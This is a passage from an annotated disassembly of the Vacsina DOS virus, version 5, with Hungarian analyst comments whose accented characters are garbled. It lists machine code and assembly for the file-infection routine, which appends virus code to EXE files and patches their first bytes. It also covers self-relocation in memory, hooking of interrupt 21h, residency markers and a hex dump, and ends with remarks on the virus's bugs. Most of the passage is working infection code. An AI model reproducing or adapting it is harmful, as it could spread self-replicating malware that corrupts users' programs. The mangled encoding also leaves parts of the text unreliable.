|||
|
02FF 9D POPF
|
|||
|
0300 2E CS:
|
|||
|
0301 FF2E0000 JMP FAR [0000] ;ERE_INT21
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; EXE file COM-m<> alk<6C>t<EFBFBD>sa
|
|||
|
;---------------------------------------------------------------
|
|||
|
; file hossz < 64947D
|
|||
|
|
|||
|
0305 B80242 * MOV AX,4202 ;File v<>g<EFBFBD>re <20>ll
|
|||
|
0308 B90000 MOV CX,0000
|
|||
|
030B 8BD1 MOV DX,CX
|
|||
|
030D 2E CS:
|
|||
|
030E 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0312 CD21 INT 21
|
|||
|
0314 72B4 JB 02CA ;Hib<69>n<EFBFBD>l
|
|||
|
0316 83FA00 CMP DX,+00
|
|||
|
0319 75AF JNZ 02CA
|
|||
|
031B 3DB3FD CMP AX,FDB3 ;64947D
|
|||
|
031E 73AA JNB 02CA
|
|||
|
|
|||
|
|
|||
|
; Stimmel-e az EXE headerje?
|
|||
|
|
|||
|
0320 2E CS:
|
|||
|
0321 A39E04 MOV [049E],AX ;ERE_HOSSZ
|
|||
|
0324 2E CS:
|
|||
|
0325 A11000 MOV AX,[0010] ;Filehossz lapokban
|
|||
|
0328 48 DEC AX
|
|||
|
0329 B109 MOV CL,09 ;* 512D
|
|||
|
032B D3E0 SHL AX,CL
|
|||
|
032D 2E CS:
|
|||
|
032E 03060E00 ADD AX,[000E] ;+a marad<61>k
|
|||
|
0332 2E CS:
|
|||
|
0333 3B069E04 CMP AX,[049E] ;Egyezik-e a hosszal?
|
|||
|
0337 7591 JNZ 02CA ;Ha nem
|
|||
|
|
|||
|
|
|||
|
; A v<>rus egy r<>sz<73>t hozz<7A>f<EFBFBD>zi az EXE-hez (Igy COM lehet majd az EXE)
|
|||
|
|
|||
|
0339 2E CS:
|
|||
|
033A 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
033E B440 MOV AH,40 ;WRITE_HANDLE (bx,ds:dx,cx)
|
|||
|
0340 0E PUSH CS
|
|||
|
0341 1F POP DS
|
|||
|
0342 BA3900 MOV DX,0039 ;Innent<6E>l
|
|||
|
0345 B98400 MOV CX,0084 ;132D byte ki<6B>r<EFBFBD>sa
|
|||
|
0348 CD21 INT 21
|
|||
|
034A 72C8 JB 0314 ;Hib<69>n<EFBFBD>l
|
|||
|
034C 3D8400 CMP AX,0084
|
|||
|
034F 75E6 JNZ 0337 ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; Directory bejegyz<79>s aktualiz<69>l<EFBFBD>sa
|
|||
|
|
|||
|
0351 2E CS:
|
|||
|
0352 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0356 B445 MOV AH,45 ;DUPLICATE_HANDLE (bx)
|
|||
|
0358 CD21 INT 21
|
|||
|
035A 7208 JB 0364 ;Hib<69>n<EFBFBD>l
|
|||
|
035C 8BD8 MOV BX,AX
|
|||
|
035E B43E MOV AH,3E ;CLOSE_HANDLE (bx)
|
|||
|
0360 CD21 INT 21
|
|||
|
0362 72B0 JB 0314 ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; File elj<6C>re
|
|||
|
|
|||
|
0364 B80042 MOV AX,4200
|
|||
|
0367 B90000 MOV CX,0000
|
|||
|
036A 8BD1 MOV DX,CX
|
|||
|
036C 2E CS:
|
|||
|
036D 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
0371 CD21 INT 21
|
|||
|
0373 729F JB 0314 ;Hib<69>n<EFBFBD>l
|
|||
|
|
|||
|
|
|||
|
; Leend<6E> els<6C> 3 byte kisz<73>m<EFBFBD>t<EFBFBD>sa
|
|||
|
|
|||
|
0375 2E CS:
|
|||
|
0376 C6060C00E9 MOV BYTE PTR [000C],E9 ;JMP k<>dja
|
|||
|
037B 2E CS:
|
|||
|
037C A19E04 MOV AX,[049E] ;ERE_HOSSZ
|
|||
|
037F 051100 ADD AX,0011 ;0039+0011+3=004D a bel<65>p<EFBFBD>si pont
|
|||
|
0382 2E CS:
|
|||
|
0383 A30D00 MOV [000D],AX ;JMP operandusa
|
|||
|
|
|||
|
|
|||
|
; Az els<6C> 3 byte fel<65>l<EFBFBD>r<EFBFBD>sa
|
|||
|
|
|||
|
0386 2E CS:
|
|||
|
0387 8B1E0A00 MOV BX,[000A] ;HANDLE
|
|||
|
038B B440 MOV AH,40 ;WRITE_HANDLE
|
|||
|
038D 0E PUSH CS
|
|||
|
038E 1F POP DS
|
|||
|
038F BA0C00 MOV DX,000C ;offset BUFFER
|
|||
|
0392 B90300 MOV CX,0003 ;3 byte <20>r<EFBFBD>sa
|
|||
|
0395 CD21 INT 21 ;COM t<>pus<75> lesz a file
|
|||
|
0397 E930FF JMP 02CA ;V<>ge
|
|||
|
;Megj.:Ha itt egy JMP 0150 <20>llna egyb<79>l fert<72>zhetne
|
|||
|
EXE-t
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; V<>ltoz<6F> (ax eredeti <20>rt<72>ke)
|
|||
|
;---------------------------------------------------------------
|
|||
|
|
|||
|
039A ERE_AX DW ?
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; Bel<65>p<EFBFBD>si pont COM programn<6D>l
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
|
|||
|
039C E80000 * CALL 039F
|
|||
|
039F 5B * POP BX ;bx=039F
|
|||
|
03A0 2E CS:
|
|||
|
03A1 8947FB MOV [BX-05],AX ;ERE_AX (039A)
|
|||
|
|
|||
|
|
|||
|
; Annak eld<6C>nt<6E>se, hogy a mem<65>ri<72>ban ven-e m<>r Vacsina
|
|||
|
|
|||
|
03A4 B80000 MOV AX,0000
|
|||
|
03A7 8EC0 MOV ES,AX
|
|||
|
03A9 26 ES:
|
|||
|
03AA A1C500 MOV AX,[00C5] ;INT 31 vektor<6F>nak 2.,3. byteja
|
|||
|
03AD 3D7F39 CMP AX,397F ;Van-e m<>r Vacsina a mem<65>ri<72>ban ?
|
|||
|
03B0 7508 JNZ 03BA ;Ugr<67>s, ha m<>g nem.
|
|||
|
03B2 26 ES:
|
|||
|
03B3 A0C700 MOV AL,[00C7] ;Mem<65>ri<72>ban l<>v<EFBFBD> v<>rus verzi<7A>sz<73>ma
|
|||
|
03B6 3C05 CMP AL,05 ;Ennek a v<>rusnak a verzi<7A>sz<73>ma
|
|||
|
03B8 7332 JNB 03EC ;Ugr<67>s, ha <20>jjabb vagy ez a verzi<7A>
|
|||
|
|
|||
|
|
|||
|
; Van-e el<65>g szadab mem<65>ria
|
|||
|
|
|||
|
03BA 8BD4 * MOV DX,SP
|
|||
|
03BC 2BD3 SUB DX,BX
|
|||
|
03BE 81EA6C0B SUB DX,0B6C
|
|||
|
03C2 7228 JB 03EC ;Ugr<67>s, ha nincs el<65>g szabad mem<65>ria
|
|||
|
|
|||
|
|
|||
|
;A v<>rus k<>l<EFBFBD>n mem<65>riablokkba fog ker<65>lni, aminek le<6C>r<EFBFBD> blokkja a v<>rus el<65>
|
|||
|
tt helyezkedik el.
|
|||
|
;Ennek a mem<65>riablokknak hossz<73>t <20>ll<6C>tja itt be.
|
|||
|
|
|||
|
03C4 BAC504 MOV DX,04C5 ;V<>rus <20>ltal ig<69>nyelt mem<65>ria + 0F
|
|||
|
03C7 B104 MOV CL,04
|
|||
|
03C9 D3EA SHR DX,CL ;DIV 10
|
|||
|
03CB 2E CS:
|
|||
|
03CC 899754FC MOV [BX+FC54],DX ;MLB_HOSSZ (FFF3) Mem<65>riale<6C>r<EFBFBD> blokk
|
|||
|
hossza
|
|||
|
|
|||
|
|
|||
|
; A v<>rus h<>tr<74>bb m<>solja mag<61>t (004C paragrafussal)
|
|||
|
|
|||
|
03D0 8CD9 MOV CX,DS
|
|||
|
03D2 03D1 ADD DX,CX
|
|||
|
03D4 8EC2 MOV ES,DX ;Ide kell h<>tr<74>bbmozgatni mindent
|
|||
|
03D6 8BF3 MOV SI,BX
|
|||
|
03D8 81C651FC ADD SI,FC51 ;si=FFF0 (v<>rus a hozz<7A> csatolt mem<65>
|
|||
|
riale<EFBFBD>r<EFBFBD> blokkal)
|
|||
|
03DC 8BFE MOV DI,SI ;Ugyanilyen offset<65> helyre m<>sol
|
|||
|
03DE B9B604 MOV CX,04B6 ;V<>rus hossza
|
|||
|
03E1 FC CLD
|
|||
|
03E2 F3 REPZ
|
|||
|
03E3 A4 MOVSB
|
|||
|
|
|||
|
|
|||
|
; A vez<65>rl<72>s <20>tker<65>l a "m<>solat" v<>rusra
|
|||
|
|
|||
|
03E4 06 PUSH ES
|
|||
|
03E5 E80300 CALL 03EB
|
|||
|
03E8 EB13 JMP 03FD ;es:03FD-n folytat<61>dik
|
|||
|
03EA 90 NOP
|
|||
|
03EB CB * RETF
|
|||
|
|
|||
|
|
|||
|
; Az eredeti program futtat<61>sa
|
|||
|
|
|||
|
03EC 8CC8 * MOV AX,CS
|
|||
|
03EE 8ED8 MOV DS,AX ;Szegmensregiszterek be<62>ll<6C>t<EFBFBD>sa
|
|||
|
03F0 8EC0 MOV ES,AX
|
|||
|
03F2 8ED0 MOV SS,AX
|
|||
|
03F4 2E CS:
|
|||
|
03F5 8B47FB MOV AX,[BX-05] ;ERE_AX (039A)
|
|||
|
03F8 2E CS:
|
|||
|
03F9 FFA70101 JMP [BX+0101] ;ERE_2_3 (04A0) Hol kezd<7A>d<EFBFBD>tt az ered
|
|||
|
eti program?
|
|||
|
|
|||
|
|
|||
|
; Ide ker<65>l a vez<65>rl<72>s a m<>r lem<65>solt v<>rusban (03E8-r<>l)
|
|||
|
; Az eredeti programot, PSP-j<>t, mem.le<6C>r<EFBFBD> blokkj<6B>t is h<>tr<74>bb mozgatjuk
|
|||
|
|
|||
|
03FD BE0000 * MOV SI,0000 ;Megj.: felesleges
|
|||
|
0400 BF0000 MOV DI,0000
|
|||
|
0403 8BCB MOV CX,BX ;bx=039F
|
|||
|
0405 81C161FC ADD CX,FC61 ;cx=0000 (eredeti program+PSP+mem.le
|
|||
|
<EFBFBD>r<EFBFBD> blokk hossza)
|
|||
|
0409 8CC2 MOV DX,ES
|
|||
|
040B 4A DEC DX
|
|||
|
040C 8EC2 MOV ES,DX ;szegmens--, mert a mem.le<6C>r<EFBFBD> blokkot
|
|||
|
is m<EFBFBD>soljuk
|
|||
|
040E 8CDA MOV DX,DS
|
|||
|
0410 4A DEC DX
|
|||
|
0411 8EDA MOV DS,DX
|
|||
|
0413 03F1 ADD SI,CX
|
|||
|
0415 4E DEC SI ;Visszafel<65> m<>solunk az<61>rt kell
|
|||
|
0416 8BFE MOV DI,SI
|
|||
|
0418 FD STD
|
|||
|
0419 F3 REPZ
|
|||
|
041A A4 MOVSB
|
|||
|
041B FC CLD
|
|||
|
|
|||
|
|
|||
|
; H<>tr<74>bbmozgat<61>s dokument<6E>l<EFBFBD>sa
|
|||
|
|
|||
|
041C 2E CS:
|
|||
|
041D 8B9754FC MOV DX,[BX+FC54] ;MLB_HOSSZ=4C Virus <20>ltal lefoglalt m
|
|||
|
em<EFBFBD>riablokk hossza
|
|||
|
0421 26 ES:
|
|||
|
0422 29160300 SUB [0003],DX ;Az eredeti program mem.blokkj<6B>nak cs
|
|||
|
<EFBFBD>kkent<EFBFBD>se
|
|||
|
0426 26 ES:
|
|||
|
0427 8C0E0100 MOV [0001],CS ;Uj gazda
|
|||
|
|
|||
|
|
|||
|
; V<>rus visszam<61>sol<6F>sa a szabadd<64> tett helyre
|
|||
|
|
|||
|
042B BF0000 MOV DI,0000
|
|||
|
042E 8BF3 MOV SI,BX ;bx=039F
|
|||
|
0430 81C651FC ADD SI,FC51 ;FFF0 V<>rus kezdete (mem.le<6C>r<EFBFBD> blokk
|
|||
|
al egy<EFBFBD>tt)
|
|||
|
0434 B9B604 MOV CX,04B6
|
|||
|
0437 1E PUSH DS
|
|||
|
0438 07 POP ES ;V<>sszam<61>solunk
|
|||
|
0439 0E PUSH CS
|
|||
|
043A 1F POP DS ;es=ds ; ds=cs
|
|||
|
043B F3 REPZ
|
|||
|
043C A4 MOVSB
|
|||
|
|
|||
|
|
|||
|
; Egy<67>b teend<6E>k (az <20>j PSP miatt)
|
|||
|
|
|||
|
043D 26 ES:
|
|||
|
043E 832E030001 SUB WORD PTR [0003],+01 ;A mem.le<6C>r<EFBFBD> blokk hossz<73>t nem kell s
|
|||
|
z<EFBFBD>molni!
|
|||
|
0443 53 PUSH BX
|
|||
|
0444 8CCB MOV BX,CS
|
|||
|
0446 B450 MOV AH,50 ;SET_PSP (bx)
|
|||
|
0448 CD21 INT 21
|
|||
|
044A 5B POP BX
|
|||
|
044B 2E CS:
|
|||
|
044C 8C0E3600 MOV [0036],CS ;PSP-n bel<65>l a gazda mehat<61>roz<6F>sa
|
|||
|
0450 2E CS:
|
|||
|
0451 8B162C00 MOV DX,[002C] ;Environment szegmense
|
|||
|
0455 4A DEC DX
|
|||
|
0456 8EC2 MOV ES,DX ;Environment mem.le<6C>r<EFBFBD> blokkja
|
|||
|
0458 26 ES:
|
|||
|
0459 8C0E0100 MOV [0001],CS ;Uj gazda
|
|||
|
|
|||
|
|
|||
|
; INT 21 lek<65>rdez<65>se <20>s <20>t<EFBFBD>r<EFBFBD>sa
|
|||
|
|
|||
|
045D B82135 MOV AX,3521 ;GET_INT_VECT (es:bx)
|
|||
|
0460 53 PUSH BX
|
|||
|
0461 CD21 INT 21
|
|||
|
0463 36 SS:
|
|||
|
0464 8C060200 MOV [0002],ES ;ERE_INT21+2
|
|||
|
0468 36 SS:
|
|||
|
0469 891E0000 MOV [0000],BX ;ERE_INT21
|
|||
|
046D 5B POP BX
|
|||
|
046E B82125 MOV AX,2521 ;SET_INT_VECT (ds:dx)
|
|||
|
0471 8CD2 MOV DX,SS
|
|||
|
0473 8EDA MOV DS,DX
|
|||
|
0475 BAC000 MOV DX,00C0 ;00C0-t<>l lesz az INT 21 rutin
|
|||
|
0478 CD21 INT 21
|
|||
|
|
|||
|
|
|||
|
; "A v<>rus m<>r a mem<65>ri<72>ban van" jelz<6C>s
|
|||
|
|
|||
|
047A B80000 MOV AX,0000
|
|||
|
047D 8EC0 MOV ES,AX
|
|||
|
047F 26 ES:
|
|||
|
0480 C706C5007F39 MOV WORD PTR [00C5],397F;Azonos<6F>t<EFBFBD> sz<73>
|
|||
|
0486 26 ES:
|
|||
|
0487 C606C70005 MOV BYTE PTR [00C7],05 ;V<>rus verzi<7A>sz<73>ma
|
|||
|
|
|||
|
|
|||
|
; DTA be<62>ll<6C>t<EFBFBD>sa (rosszul!)
|
|||
|
|
|||
|
048C 8CC8 MOV AX,CS
|
|||
|
048E 8ED8 MOV DS,AX
|
|||
|
0490 B41A MOV AH,1A ;SET_DTA_ADDRESS (ds:dx)
|
|||
|
0492 BA5000 MOV DX,0050 ;HIBA !!! 0080 kellene
|
|||
|
0495 CD21 INT 21
|
|||
|
|
|||
|
|
|||
|
; Az eredeti program futtat<61>s<EFBFBD>ra ugr<67>s
|
|||
|
|
|||
|
0497 2E CS:
|
|||
|
0498 8B47FB MOV AX,[BX-05] ;ERE_AX (039A) Megj.:Teljesen felesle
|
|||
|
ges
|
|||
|
049B E94EFF JMP 03EC
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; A file utols<6C> 8 byteja tartalmazza a fontos inform<72>ci<63>kat
|
|||
|
;---------------------------------------------------------------
|
|||
|
|
|||
|
049E ERE_HOSSZ DW ? ;A file eredeti hossza
|
|||
|
04A0 ERE_2_3 DW ? ;A file eredeti 2.,3. byteja+0103
|
|||
|
04A2 AZONOSITO DW 7AF4 ;Azonos<6F>t<EFBFBD>sz<73>. Ez alapj<70>n ismeri fel a fert<72>z<EFBFBD>
|
|||
|
st
|
|||
|
04A4 VERZIOSZAM DB 5 ;V<>rus verzi<7A>sz<73>ma
|
|||
|
04A5 ERE_1 DB 0 ;M<>g nem haszn<7A>lt (az els<6C> byte mindig E9)
|
|||
|
|
|||
|
|
|||
|
V<EFBFBD>rus elej<EFBFBD>nek hexa dump-ja:
|
|||
|
|
|||
|
cs-1:0000 4D 07 00 4B 00 00 00 00-00 00 00 00 00 00 00 00 M..K............
|
|||
|
cs-1:0010 72 0E AE 0F 56 05 20 0D-20 00 05 00 03 01 CD 21 r...V. . ......!
|
|||
|
cs-1:0020 B4 00 CD 20 00 56 41 43-53 49 4E 41 20 20 20 20 ... .VACSINA
|
|||
|
cs-1:0030 00 00 80 00 00 00 00 00-7C 11 37 A8 00 40 C2 00 ........|.7..@..
|
|||
|
cs-1:0040 46 0A 00 00 00 00 00 00-00 20 20 20 20 20 20 20 F........
|
|||
|
cs-1:0050 20 20 20 20 20 20 20 20-20 20 20 20 20 E8 00 00 ...
|
|||
|
|
|||
|
|
|||
|
Megjegyz<EFBFBD>sek:
|
|||
|
|
|||
|
- A file eredeti idej<EFBFBD>t nem k<EFBFBD>redezi le, <EFBFBD>s nem <EFBFBD>ll<EFBFBD>tja vissza.
|
|||
|
- DTA-t rosszul <EFBFBD>ll<EFBFBD>tja be. Ez a gyermekbetegs<EFBFBD>g a k<EFBFBD>s<EFBFBD>bbi verzi<EFBFBD>kban is megmara
|
|||
|
dt.
|
|||
|
- <EFBFBD>rdekes, hogy az EXE k<EFBFBD>dj<EFBFBD>t az 5A4D-t itt csak <EFBFBD>gy haszn<EFBFBD>lja, m<EFBFBD>g a k<EFBFBD>s<EFBFBD>bbi ve
|
|||
|
rzi<EFBFBD>k a 4D5A-t
|
|||
|
is haszn<EFBFBD>lj<EFBFBD>k.
|
|||
|
- EXE-k COM-m<EFBFBD> alak<EFBFBD>t<EFBFBD>sa ut<EFBFBD>n nem tudom, hogy mi<EFBFBD>rt nem mindj<EFBFBD>rt a COM megfert<EFBFBD>z
|
|||
|
<EFBFBD>se r<EFBFBD>szre ugrik.
|
|||
|
- J<EFBFBD>p<EFBFBD>r felesleges utas<EFBFBD>t<EFBFBD>s van a k<EFBFBD>dban, ami m<EFBFBD>g a k<EFBFBD>s<EFBFBD>bbi verzi<EFBFBD>kban is megmar
|
|||
|
adt.
|
|||
|
- A v<EFBFBD>rus eg<EFBFBD>sz m<EFBFBD>k<EFBFBD>d<EFBFBD>se arra utal, hogy csak kis<EFBFBD>rletez<EFBFBD>sr<EFBFBD>l van sz<EFBFBD>.
|